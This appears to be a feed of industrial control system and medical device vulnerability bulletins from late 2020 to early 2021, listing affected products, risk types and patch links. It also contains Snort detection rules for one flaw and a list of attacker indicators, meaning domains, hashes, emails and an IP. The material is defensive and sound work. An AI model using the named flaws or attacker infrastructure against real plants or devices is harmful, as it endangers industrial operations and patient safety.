- OPC UA Tunneller: All versions prior to 6.3.0.8233

Vulnerability risks:
- disclose sensitive information
- remotely execute arbitrary code
- crash the device

Patch available
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Delta Electronics TPEditor

22/01/2021

Vulnerability affects :
- TPEditor: v1.98 and prior

Vulnerability risks:
- execute code under the privileges of the application

Patch available :
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Delta Electronics ISPSoft

22/01/2021

Vulnerability affects :
- ISPSoft: v3.12 and prior

Vulnerability risks:
- execute code under the privileges of the application

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] ABB - AC500 V2

20/01/2021

Vulnerability affects :
- All AC500 V2 products with onboard ethernet

Vulnerability risks:
- Stop the PLC

Patch available :
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Philips Interventional Workstations

20/01/2021

Vulnerability affects :
-  Haswell workstations labeled with 12NC identification numbers (4598 009 39471, 4598 009 39481, 4598 009 70861, 4598 009 98531) with :
   - Interventional Workspot (Release 1.3.2, 1.4.0, 1.4.1, 1.4.3, 1.4.5)
   - Coronary Tools/Dynamic Coronary Roadmap/Stentboost Live (Release 1.0)
   - ViewForum (Release 6.3V1L10)

Vulnerability risks:
- remotely shut down or restart the workstation

Patch available :
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Dnsmasq

20/01/2021

Vulnerability affects :
- Dnsmasq DNS and DHCP server, versions 2.82 and prior (fixed in 2.83)

Vulnerability risks:
- cache poisoning
- remote code execution
- denial-of-service 

Patch available :
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Reolink RLC-4XX, RLC-5XX and RLN-X10 cameras

20/01/2021

Vulnerability affects :
- RLC-4XX series
- RLC-5XX series
- RLN-X10 series

Vulnerability risks:
- unauthorized access to sensitive information

Patch available :
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] DNSpooq - Dnsmasq Vulnerabilities in SCALANCE and RUGGEDCOM Devices

19/01/2021

Vulnerability affects :
- RUGGEDCOM RM1224 : All versions
- SCALANCE M-800 : All versions
- SCALANCE S615 : All versions
- SCALANCE SC-600 : All versions
- SCALANCE W1750D : All versions

Vulnerability risks:
- DNS cache poisoning: the DNSpooq vulnerabilities in the embedded Dnsmasq forwarder affect the validation of DNS responses

Patch available :
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] SOOIL Dana Diabecare RS Products

16/01/2021

Vulnerability affects :
- Dana Diabecare RS: All versions prior to 3.0
- AnyDana-i: All versions prior to 3.0
- AnyDana-A: All versions prior to 3.0

Vulnerability risks:
- access sensitive information
- modify therapy settings
- bypass authentication
- crash the device being accessed

These vulnerabilities could affect patient safety
Patch available :
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Schneider Electric EcoStruxure Power Build-Rapsody

16/01/2021

Vulnerability affects :
- EcoStruxure Power Build - Rapsody software Versions 2.1.13 and prior

Vulnerability risks:
- allow a local attacker to upload a malicious SSD file
- resulting in a use-after-free condition or a stack-based buffer overflow

Patch available :
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Siemens SCALANCE X Switches

16/01/2021

Vulnerability affects :
- SCALANCE X-200 switch family (incl. SIPLUS NET variants): All versions
- SCALANCE X-200IRT switch family (incl. SIPLUS NET variants): All versions
- SCALANCE X-300 switch family (incl. X408 and SIPLUS NET variants): All versions prior to v4.1.0

Patch available :
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Siemens JT2Go and Teamcenter Visualization

16/01/2021

Vulnerability affects :
- JT2Go: All versions prior to v13.1.0
- JT2Go: Version 13.1.0 only affected by CVE-2020-26989, CVE-2020-26990, CVE-2020-26991
- Teamcenter Visualization: All versions prior to V13.1.0
- Teamcenter Visualization: Version 13.1.0 only affected by CVE-2020-26989, CVE-2020-26990, CVE-2020-26991

Vulnerability risks:
- Type Confusion
- Improper Restriction of XML External Entity Reference
- Out-of-bounds Write
- Heap-based Buffer Overflow
- Stack-based Buffer Overflow
- Untrusted Pointer Dereference
- Out-of-bounds Read

Patch available :
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Siemens Solid Edge

16/01/2021

Vulnerability affects :
- Solid Edge: All versions prior to SE2021MP2

Patch available :
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Siemens SCALANCE X Products

16/01/2021

Vulnerability affects :
- SCALANCE X-200 switch family (incl. SIPLUS NET variants): All versions
- SCALANCE X-200IRT switch family (incl. SIPLUS NET variants): All versions
- SCALANCE X-300 switch family (incl. X408 and SIPLUS NET variants): All versions prior to v4.1.0


Vulnerability risks:
- denial-of-service conditions
- buffer overflows

Patch available :
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Delta Electronics CNCSoft ScreenEditor

05/01/2021

Vulnerability affects :
- CNCSoft ScreenEditor Versions 1.01.26 and prior

Vulnerability risks:
- arbitrary code execution

Patch available :
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Delta Electronics DOPSoft

05/01/2021

Vulnerability affects :
- DOPSoft Version 4.0.8.21 and prior

Vulnerability risks:
- 

Patch available :
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Red Lion Crimson 3.1

05/01/2021

Vulnerability affects :
- Crimson 3.1: Build versions prior to 3119.001

Vulnerability risks:
- create a denial-of-service condition
- read and modify the database
- leak memory data

Patch available :
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] GE Reason RT43X Clocks

05/01/2021

Vulnerability affects :
- RT430, RT431 & RT434: All firmware versions prior to Version 08A06

Vulnerability risks:
- Code Injection
- Use of Hard-coded Cryptographic Key

Patch available :
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Panasonic FPWIN Pro

05/01/2021

Vulnerability affects :
- FPWIN Pro Version 7.5.0.0 and prior

Vulnerability risks:
- out-of-bounds read, which may allow remote code execution

Patch available :
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Schneider Electric Web Server on Modicon M340

05/01/2021

Vulnerability affects :
- M340 CPUs
    - BMX P34x, all versions
- M340 Communication Ethernet modules
    - BMX NOE 0100 (H), all versions
    - BMX NOE 0110 (H), all versions
    - BMX NOC 0401, all versions
    - BMX NOR 0200H, all versions
- Premium processors with integrated Ethernet COPRO
    - TSXP574634, TSXP575634, TSXP576634, all versions
- Premium communication modules
    - TSXETY4103, all versions
    - TSXETY5103, all versions
- Quantum processors with integrated Ethernet COPRO
    - 140CPU65xxxxx, all versions
- Quantum communication modules
    - 140NOE771x1, all versions
    - 140NOC78x00, all versions
    - 140NOC77101, all versions


Vulnerability risks:
- 

Patch available :
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Treck TCP/IP Stack

19/12/2020

Vulnerability affects :
- Treck TCP/IP stack Version 6.0.1.67 and prior (HTTP Server, IPv6, DHCPv6)

Vulnerability risks:
- remote code execution
- denial-of-service

Patch available :
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] PTC Kepware LinkMaster

18/12/2020

Vulnerability affects :
- Kepware LinkMaster Version 3.0.94.0 and prior

Vulnerability risks:
- execute arbitrary code with NT SYSTEM privileges

Patch available : 
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] PTC Kepware KEPServerEX

18/12/2020

Vulnerability affects :
- KEPServerEX: v6.0 to v6.9
- ThingWorx Kepware Server: v6.8 and v6.9
- ThingWorx Industrial Connectivity: All versions 
- OPC-Aggregator: All versions
Possibly also affected :
- Rockwell Automation KEPServer Enterprise
- GE Digital Industrial Gateway Server: v7.68.804 and v7.66
- Software Toolbox TOP Server: All 6.x versions

Vulnerability risks:
- server crashing
- a denial-of-service condition
- data leakage
- remote code execution

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Emerson Rosemount X-STREAM

18/12/2020

Vulnerability affects :
- X-STREAM enhanced XEGP – all revisions 
- X-STREAM enhanced XEGK – all revisions 
- X-STREAM enhanced XEFD – all revisions 
- X-STREAM enhanced XEXF – all revisions


Vulnerability risks:
- download files and obtain sensitive information

Patch available : 
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Lantronix XPort EDGE

16/12/2020

Vulnerability affects :
- Web Manager functionality of Lantronix XPort :
    - Lantronix XPort EDGE 3.0.0.0R11
    - Lantronix XPort EDGE 3.1.0.0R9
    - Lantronix XPort EDGE 3.4.0.0R12
    - Lantronix XPort EDGE 4.2.0.0R7
    - Lantronix SGX 5150 8.7.0.0R1
    - Lantronix SGX 5150 8.9.0.0R4

Vulnerability risks:
- Authentication bypass
- Cleartext Transmission of Sensitive Information

Snort rules : 
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS ( msg:"POLICY-OTHER TRUFFLEHUNTER TALOS-2020-1135 attack attempt"; service:http; reference:cve,2020-13527; reference:url,www.talosintelligence.com/reports/TALOS-2020-1135/; classtype:policy-violation; soid:54762; gid:3; sid:54762; rev:1; )
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS ( msg:"POLICY-OTHER TRUFFLEHUNTER TALOS-2020-1135 attack attempt"; service:http; reference:cve,2020-13527; reference:url,www.talosintelligence.com/reports/TALOS-2020-1135/; classtype:policy-violation; soid:54763; gid:3; sid:54763; rev:1; )
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS ( msg:"POLICY-OTHER TRUFFLEHUNTER TALOS-2020-1135 attack attempt"; service:http; reference:cve,2020-13527; reference:url,www.talosintelligence.com/reports/TALOS-2020-1135/; classtype:policy-violation; soid:54764; gid:3; sid:54764; rev:1; )

Patch available : https://www.lantronix.com/support-latest_release_by_product-html/
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Central Licensing System Vulnerabilities, impact on Symphony® Plus, Composer Harmony, Composer Melody, Harmony OPC Server

15/12/2020

Vulnerability affects :
- ABB Central Licensing System (CLS) as used in ABB Ability™ Symphony Plus Operations (3.0 to 3.3)
- ABB Central Licensing System (CLS) as used in ABB Ability™ Symphony Plus Engineering (1.0 to 2.3)
- ABB Central Licensing System (CLS) as used in Composer Harmony (5.1, 6.0, 6.1)
- ABB Central Licensing System (CLS) as used in Composer Melody (5.3, 6.1)
- ABB Central Licensing System (CLS) as used in Harmony OPC Server (6.0, 6.1, 7.0)

Vulnerability risks:
- XXE vulnerability
- Denial of Service
- Elevation of privilege vulnerability
- Weak File Permissions
- Information Disclosure

Patch available
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Multiple Vulnerabilities in Symphony® Plus Historian

15/12/2020

Vulnerability affects :
- S+ Historian 3.0 and 3.1

Vulnerability risks:
- SQL Injection
- Improper Authorization
- Weak Authentication
- Insecure Windows Services
- Web Application Security
- Privilege Escalation
- Denial of Service
- Improper Credential Storage

Patch available
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Multiple Vulnerabilities in Symphony® Plus Operations

15/12/2020

Vulnerability affects :
- S+ Operations 1.1
- S+ Operations 2.0 (including all Service Packs)
- S+ Operations 2.1 Service Pack 1 (SP1) (for Melody & other Heritage systems)
- S+ Operations 2.1 Service Pack 2 (SP2)
- S+ Operations 3.0
- S+ Operations 3.1
- S+ Operations 3.2
- S+ Operations 3.3

Vulnerability risks:
- SQL Injection
- Improper Authorization
- Weak Authentication
- Insecure Windows Services
- Web Application Security
- Privilege Escalation
- Denial of Service
- Improper Credential Storage
- Authentication Bypass

Patch available
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Host Engineering H2-ECOM100 Module

10/12/2020

Vulnerability affects :
    - H0-ECOM100 Module:
        - Hardware Versions 6x and prior with Firmware Versions 4.0.348 and prior
        - Hardware Version 7x with Firmware Versions 4.1.113 and prior
        - Hardware Version 9x with Firmware Versions 5.0.149 and prior
    - H2-ECOM100 Module:
        - Hardware Versions 5x and prior with Firmware Versions 4.0.2148 and prior
        - Hardware Version 8x with Firmware Versions 5.0.1043 and prior
    - H4-ECOM100 Module: Firmware Versions 4.0.2148 and prior


Vulnerability risks:
- Improper Input Validation could lead to a DoS
- Improper Input Validation could force an operator to perform a manual restart

Patch available
See the documents below for more information
Sources :
CVE :

10/12/2020

Vulnerability affects :
- Smart Model 25000 Patient Reader, all versions

Vulnerability risks:
- Improper Authentication
- Heap-based Buffer Overflow
- Time-of-check Time-of-use Race Condition

Patch available
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Mitsubishi Electric MELSEC iQ-F Series

10/12/2020

Vulnerability affects :
- FX5U(C) CPU module: firmware Version 1.060 or earlier

Vulnerability risks:
- Improper Check or Handling of Exceptional Conditions (risk : DoS, reset CPU module)

Patch available
See the documents below for more information
CVE :

[VULNERABILITY] Multiple Vulnerabilities in Schneider Electric

08/12/2020

Vulnerability affects :
- EcoStruxure™ Control Expert
- Unity Pro (former name of EcoStruxure™ Control Expert)
- EcoStruxure Geo SCADA Expert 2019 versions prior to 81.7613.1
- EcoStruxure Geo SCADA Expert 2020 versions prior to 83.7613.1
- Modicon M340 CPU BMXP34* versions prior to V3.3
- Modicon M340 Ethernet Communication modules BMXNOC0401 versions prior to V2.10 (*)
- Modicon M340 Ethernet Communication modules BMXNOE0100 versions prior to V3.4
- Modicon M340 Ethernet Communication modules BMXNOE0110 versions prior to V6.6
- Modicon Premium processors with integrated Ethernet COPRO TSXP574634, TSXP575634, TSXP576634
- Modicon Quantum CPUs 140CPU65xxxxx versions prior to V6.1 (*)
- Modicon Quantum communication modules 140NOE771x1 versions prior to V7.3 (*)
- Modicon Quantum communication modules 140NOC78x00 versions prior to V1.74 (*)
- Modicon Quantum communication modules 140NOC77101 versions prior to V1.08
- Modicon Premium communication modules TSXETY4103 versions prior to V6.2 (*)
- Modicon Premium communication modules TSXETY5103 versions prior to V6.4 (*)
- Modicon Premium CPUs TSXP574634, TSXP575634, TSXP576634 versions prior to V6.1 (*)
- BMXNOE0100
- BMXNOE0110
- BMXNOR0200H
- BMXNOR200H
- Modicon M580 CPUs BMEx58xxxxx firmware versions prior to 3.20
- Modicon M258 versions prior to 5.0.4.11
- SoMachine/SoMachine Motion software

Vulnerability risks:
- Arbitrary code execution
- Remote Denial of Service
- Breach of confidentiality of data

Patch available
See the documents below for more information
Sources :
CVE :

08/12/2020

Vulnerability affects :
- LOGO! 8 BM (incl. SIPLUS variants) ; All versions

Vulnerability risks:
- an attacker with access to port 135/tcp could read and modify the device configuration and obtain project files from the devices

Patch available
See the documents below for more information
Sources :
CVE :

08/12/2020

Vulnerability affects :
- LOGO! 8 BM (incl. SIPLUS variants) ; All versions < V8.3

Vulnerability risks:
- an attacker with access to port 10005/tcp could read and modify the device configuration

Patch available
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Vulnerabilities in XHQ Operations Intelligence

08/12/2020

Vulnerability affects :
- XHQ ; All Versions < 6.1

Vulnerability risks:
- data injection in the XHQ’s web interfaces

Patch available
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Missing Authentication Vulnerability in SIEMENS LOGO!

08/12/2020

Vulnerability affects :
- LOGO! 8 BM (incl. SIPLUS variants) ; All versions

Vulnerability risks:
- an attacker with access to port 135/tcp could read and modify the device configuration and obtain project files from the devices

Patch available
See the documents below for more information
Sources :
CVE :

[ATTACK] Attack on a water tank in Israel

04/11/2020

A video of an HMI of an Israeli water tank has been published. The access was initially published on the Telegram channel of an Iran-based hacker group called "Unidentified TEAM".

See the documents below for more information
Sources :

[VULNERABILITY] National Instruments CompactRIO

03/12/2020

Vulnerability affects :
- CompactRIO: Driver versions prior to 20.5     

Vulnerability risks:
- reboot the device remotely

Patch available
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Schneider Electric EcoStruxure Operator Terminal Expert runtime (Vijeo XD)

02/12/2020

Vulnerability affects :
- EcoStruxure Operator Terminal Expert Runtime 3.1 Service Pack 1A and prior installed on:
    - Windows PC using legacy BIOS
    - Harmony iPC (HMIG5U, HMIG5U2) using legacy BIOS
- Windows PCs using UEFI are not impacted    

Vulnerability risks:
- unauthorized command execution (local)

Patch available
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Fuji Electric V-Server Lite

24/11/2020

Vulnerability affects :
- V-Server Lite, all versions prior to 3.3.24.0

Vulnerability risks:
- Remote code Execution

Patch available
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Mitsubishi Electric MELSEC iQ-R Series

19/11/2020

Vulnerability affects :
- R00/01/02CPU firmware Versions 19 and earlier
- R04/08/16/32/120(EN)CPU firmware Versions 51 and earlier
- R08/16/32/120SFCPU firmware Versions 22 and earlier
- R08/16/32/120PCPU all versions
- R08/16/32/120PSFCPU all versions
- RJ71EN71 firmware Versions 47 and earlier
- RJ71GF11-T2 firmware Versions 47 and earlier
- RJ72GF15-T2 firmware Versions 07 and earlier
- RJ71GP21-SX firmware Versions 47 and earlier
- RJ71GP21S-SX firmware Versions 47 and earlier
- RJ71C24(-R2/R4) all versions
- RJ71GN11-T2 all versions 

Vulnerability risks:
- Denial-of-service

Patch available
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Johnson Controls Sensormatic Electronics American Dynamics victor Web Client

19/11/2020

Vulnerability affects :
- All versions of victor Web Client up to and including v5.6
- All versions of C•CURE Web Client up to and including v2.90

Vulnerability risks:
- Denial-of-service condition 
- Buffer overflow may allow remote code execution

Patch available
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Paradox IP150

19/11/2020

Vulnerability affects :
- Paradox IP150 firmware Version 5.02.09

Vulnerability risks:
- 

Patch available
See the documents below for more information
CVE :

[VULNERABILITY] Real Time Automation EtherNet/IP

19/11/2020

Vulnerability affects :
- All versions prior to 2.28

Vulnerability risks:
- Denial-of-service condition 
- Buffer overflow may allow remote code execution

Patch available
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Schneider Electric Interactive Graphical SCADA System (IGSS)

19/11/2020

Vulnerability affects :
- IGSS Definition (Def.exe) Version 14.0.0.20247 and prior

Vulnerability risks:
- Improper Restriction of Operations within the Bounds of a Memory Buffer
- Out-of-bounds Write
- Out-of-bounds Read

Patch available
See the documents below for more information
Sources :
CVE :

[ATTACK] Drovorub in industrial environment

14/11/2020

Schneider Electric recommends taking defensive measures against Drovorub malware, which could use Q Data Radio and J Data Radio equipment for deployment in industrial systems. 

See the documents below for more information
Sources :

[VULNERABILITY] Vulnerabilities in Schneider Electric EcoStruxure Machine Expert and M221 PLC

13/11/2020

Vulnerability affects :
- EcoStruxure Machine Expert v1.0 
- Schneider Electric M221 (Firmware 1.10.2.2)

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Mitsubishi Electric MELSEC iQ-R Series

12/11/2020

Vulnerability affects :
- R00/01/02 CPU Firmware versions from 05 to 19
- R04/08/16/32/120(EN) CPU Firmware versions from 35 to 51

Vulnerability risks:
- DoS

Patch available (update firmware)
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] BD Alaris 8015 PC Unit and BD Alaris Systems Manager

12/11/2020

Vulnerability affects :
- BD Alaris PC Unit, Model 8015, Versions 9.33.1 and earlier
- BD Alaris Systems Manager, Versions 4.33 and earlier

Vulnerability risks:
- DoS

Patch available (update firmware)
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] OSIsoft PI Interface for OPC XML-DA

10/11/2020

Vulnerability affects :
- All versions of PI Interface for OPC XML-DA prior to 1.7.3.x are affected

Vulnerability risks:
- Remotely execute arbitrary code

Patch available : https://customers.osisoft.com/s/knowledgearticle?knowledgeArticleUrl=000031534
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] OSIsoft PI Vision

10/11/2020

Vulnerability affects :
- All versions prior to PI Vision 2020 are affected.

Vulnerability risks:
- Cross-site Scripting
- Incorrect Authorization

Patch available : https://customers.osisoft.com/s/knowledgearticle?knowledgeArticleUrl=000031533
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Schneider Electric PLC Simulator for EcoStruxure Control Expert

10/11/2020

Vulnerability affects :
- PLC Simulator for EcoStruxure Control Expert, all versions
- PLC Simulator for Unity Pro (former name of EcoStruxure Control Expert), all versions

Vulnerability risks:
- Denial-of-service 

Patch available : https://www.se.com/ww/en/product-range-download/548-ecostruxure%E2%84%A2-control-expert/
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] SIMATIC S7-300 CPUs and SINUMERIK Controller (Siemens)

10/11/2020

Vulnerability affects :
- SIMATIC S7-300 CPU family (incl. related ET200 CPUs and SIPLUS variants): All versions
- SINUMERIK 840D sl: All versions

Vulnerability risks:
- Denial-of-Service

Recommendation : Protect network access to port 102/tcp of affected devices.
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Multiple Vulnerabilities in SCALANCE W1750D (Siemens)

10/11/2020

Vulnerability affects :
- SCALANCE W1750D all versions

Vulnerability risks:
- Bypass security restrictions
- Obtain sensitive information
- Perform unauthorized actions 
- Execute arbitrary code

Patch available : https://support.industry.siemens.com/cs/ww/en/view/109782770/
See the documents below for more information
Sources :
CVE :

[ATTACK] Industrial enterprises using RMS and TeamViewer

07/11/2020

- Target (only in Russia) :
    - Manufacturing
    - Oil and gas
    - Metal industry
    - Engineering
    - Energy
    - Construction
    - Mining
    - Logistics

In summer 2019, Kaspersky ICS CERT identified a new wave of phishing emails containing various malicious attachments. The emails target companies and organizations from different sectors of the economy that are associated with industrial production in one way or another.

We reported these attacks in 2018 in an article entitled “Attacks on industrial enterprises using RMS and TeamViewer“, but recent data shows that the attackers have modified their attack techniques and that the number of enterprises facing the threat of infection is growing.
Sources :

IOCs (source : Kaspersky):
- dncars.ru
- info@dncars.ru
- timkasprot.temp.swtest.ru
- z-wavehome.ru
- 99da6cf54df66738a368ab4c5332bcdef3ec4198
- 8feb7a65505c59f5096b43a744b479a9d41736ad
- ce5599239229ba3290e5ca53cf5d562d66a8cc64
- ea1440202beb02cbb49b5bef1ec013c0
- 3b79aacdc33593e8c8f560e4ab1c02c6
- 1091941264757dc7e3da0a086f69e4bb
- da4dff233ffbac362fee3ae08c4efa53
- 72f206e3a281248a3d5ca0b2c5208f5f
- 203e341cf850d7a05e44fafc628aeaf1
- 386a1594a0add346b8fbbebcf1547e77
- d768a65335e6ca715ab5ceb487f6862f
- f0072ea102a122ce8a20fa32b126b67f674834da
- cecc17cd324c2eb4eab4e0612b7f32897b18ef9e7affad5b311661a14ac2b585
- bf47ade5a50ca09793a26ade947b585032b22e9e530b4c16a8b78532d6ea755f
- 604be0b601380fc31e3262a544b1c54910057cf28cc83f9838d8f91ea903fb17
- 5461f09eba6e01b4349a31a83613987e20570d67c6dc5427327bed7208a533df
- nataly@z-wavehome.ru
- timkas@protonmail.com
- smoollsrv@gmail.com
- 77.222.56.169

[VULNERABILITY] WECON PLC Editor

06/11/2020

Vulnerability affects :
- PLC Editor Versions 1.3.8 and prior

Vulnerability risks:
- execute code under the privileges of the application

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Mitsubishi Electric GT14 Model of GOT1000 Series

06/11/2020

Vulnerability affects :
- GT1455-QTBDE with CoreOS Version 05.65.00.BD and prior, a graphic operation terminal 
- GT1450-QMBDE with CoreOS Version 05.65.00.BD and prior, a graphic operation terminal
- GT1450-QLBDE with CoreOS Version 05.65.00.BD and prior, a graphic operation terminal
- GT1455HS-QTBDE with CoreOS Version 05.65.00.BD and prior, a graphic operation terminal
- GT1450HS-QMBDE with CoreOS Version 05.65.00.BD and prior, a graphic operation terminal

Vulnerability risks:
- denial-of-service condition (DoS)
- code execution

Patch available on Mitsubishi website.
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] EDR-810 Series Security Router

03/11/2020

Vulnerability affects :
- Firmware version 5.3 and lower 
- Firmware version 5.6 and lower

Vulnerability risks:
- A crafted request to the web server could allow execution of arbitrary commands.
- A crafted request to the web server could cause a denial-of-service.
- A crafted request to the device may cause specific parts of the user interface to become unresponsive (four separate instances).

Patch available : https://www.moxa.com/en/support/product-support/software-and-documentation/search?psid=48041
See the documents below for more information
Sources :

[VULNERABILITY] MXview Series Network Management

03/11/2020

Vulnerability affects :
- Firmware Version from 3.0 to 3.1.8

Vulnerability risks:
- An attacker may be able to edit a source file to insert a malicious code to elevate their permissions

Patch available https://www.moxa.com/en/support/product-support/software-and-documentation/search?psid=53389
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] WAGO Series 750-88x and 750-352

03/11/2020

Vulnerability affects :
- All versions before FW11 of these products :
  - 750-352
  - 750-831/xxx-xxx
  - 750-852
  - 750-880/xxx-xxx
  - 750-881
  - 750-889

Vulnerability risks:
- crash the device (DoS)

Patch available : https://www.wago.com/us/requestDownload?downloadFile=FWMedia_58_750-881
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] NEXCOM NIO50

03/11/2020

Vulnerability affects :
- All versions of NEXCOM NIO 50

Vulnerability risks:
- view sensitive information 
- DoS

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Moxa EDR-G903

30/10/2020

Vulnerability affects :
- Firmware for EDR-G903 versions prior to 5.6
- Firmware for EDR-G902 versions prior to 5.6
- Firmware for EDR-810 versions prior to 5.7

Vulnerability risks:
- Improper Restriction of Operations

Patch available :
EDR-G903 Series - https://www.moxa.com/en/support/product-support/software-and-documentation/search?psid=48053
EDR-G902 Series - https://www.moxa.com/en/support/product-support/software-and-documentation/search?psid=48063
EDR-810 Series - https://www.moxa.com/en/support/product-support/software-and-documentation/search?psid=48041
See the documents below for more information
Sources :

[VULNERABILITY] JUUKO K-800 and K-808

28/10/2020

Vulnerability affects :
- JUUKO K-800 and K-808: Firmware versions prior to numbers ending ...9A, ...9B, ...9C, etc.

Vulnerability risks: 
- Authentication Bypass by Capture-replay
- Command Injection

Patch available : https://www.moxa.com/en/support/product-support/software-and-documentation/search?psid=50278
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] NPort 5100A

28/10/2020

Vulnerability affects :
- NPort 5100A versions prior to 1.6

Vulnerability risks: 
- Privilege escalation

See the documents below for more information
Sources :

[VULNERABILITY] B. Braun Melsungen AG

23/10/2020

Vulnerability affects :
- SpaceCom, software Versions U61 and earlier (United States), L81 and earlier (outside the United States)
- Battery pack with Wi-Fi, software Versions U61 and earlier (United States), L81 and earlier (outside the United States)
- Data module compactplus, software Versions A10 and A11 (not distributed in the United States)
- AP 3.0 and earlier

Vulnerability risks: 
- Relative Path Traversal
- Uncontrolled Search Path Element
- Improper Neutralization of Formula Elements in a CSV File
- XSS
- Open Redirect
- XPath Injection
- Session Fixation 
- Use of a One-way Hash without a Salt
- Relative Path Traversal
- Improper Verification of Cryptographic Signature
- Improper Privilege Management
- Use of Hard-coded Credentials
- Active Debug Code
- Improper Access Control

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Capsule Technologies SmartLinx Neuron 2

20/10/2020

Vulnerability affects :
- Capsule Technologies SmartLinx Neuron 2: Firmware Versions 9.0.3 and older

Vulnerability risks: 
- Protection Mechanism Failure

Patch is available (notice [here](https://us-cert.cisa.gov/ics/advisories/icsma-20-196-01)) 
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] WECON LeviStudioU

20/10/2020

Vulnerability affects :
- LeviStudioU: Version 2019-09-21 and prior

Vulnerability risks: 
- Stack-based Buffer Overflow
- Improper Restriction of XML External Entity Reference

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] XMC20 Multiservice-Multiplexer - Hitachi ABB Power Grids

20/10/2020

Vulnerability affects :
- XMC20 R4 using COGE5 versions older than co5ne_r1h07_12.esw
- XMC20 R6 using COGE5 versions older than co5ne_r2d14_03.esw


Vulnerability risks: 
- Bypass authentication (Improper Authentication)

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] 1794-AENT Flex I/O Series B Rockwell Automation

20/10/2020

Vulnerability affects :
- 1794-AENT Flex I/O, Series B, Versions 4.003 and prior

Vulnerability risks: 
- Buffer Overflow (Exploitable remotely)

See the documents below for more information
Sources :

[VULNERABILITY] WebAccess/SCADA (Advantech)

16/10/2020

Vulnerability affects :
- WebAccess/SCADA Versions 9.0 and prior

Vulnerability risks:
- Remote Code Execution

Patch available : https://support.advantech.com/support/DownloadSRDetail_New.aspx?SR_ID=1-1J6QG9J&Doc_Source=Download
See the documents below for more information
Sources :

[VULNERABILITY] R-SeeNet (Advantech)

16/10/2020

Vulnerability affects :
- R-SeeNet Versions 1.5.1 through 2.4.10

Vulnerability risks:
- SQL injection

Patch available : https://ep.advantech-bb.cz/products/software/r-seenet
See the documents below for more information
Sources :

[VULNERABILITY] Wibu-Systems CodeMeter

16/10/2020

Vulnerability affects :
- All versions prior to 7.10a are affected by CVE-2020-14509 and CVE-2020-14519
- All versions prior to 7.10a are affected by CVE-2020-14517
- All versions prior to 7.10 are affected by CVE-2020-16233
- All versions prior to 6.81 are affected by CVE-2020-14513 
- All versions prior to 6.90 are affected by CVE-2020-14515 when using CmActLicense update files with CmActLicense Firm Code

Vulnerability risks:
- Buffer Access with Incorrect Length Value
- Inadequate Encryption Strength
- Origin Validation Error
- Improper Input Validation
- Improper Verification of Cryptographic Signature
- Improper Resource Shutdown or Release

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Allen-Bradley Flex I/O

14/10/2020

Vulnerability affects :
- Allen-Bradley Flex I/O

Vulnerability risks:
- DoS

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Schneider Electric

14/10/2020

Vulnerability affects :
- Modicon M241 and M251 Logic Controller firmware versions prior to 5.0.8.4
- Modicon Quantum Co-processors ref. 140CPU6
- Modicon Premium Co-processors ref TSXP and TSXH
- Modicon Quantum Ethernet communication modules ref.140NOE and 140NOC
- Modicon Premium Ethernet communication modules ref. TSXETY
- Modicon M340 CPU ref BMXP34
- Modicon M340 Ethernet communication Modules ref. BMXNOC, BMXNOE, BMXNOR
- Modicon Momentum Ethernet MDI
- ATV340E Altivar Machine Drives 3.1IE23 and earlier versions
- ATV6000 Medium Voltage Altivar Process Drives 1.1IE02 and earlier versions
- ATV630/650/660/680/6A0/6B0 Altivar Process Drives 2.6IE31 and earlier versions
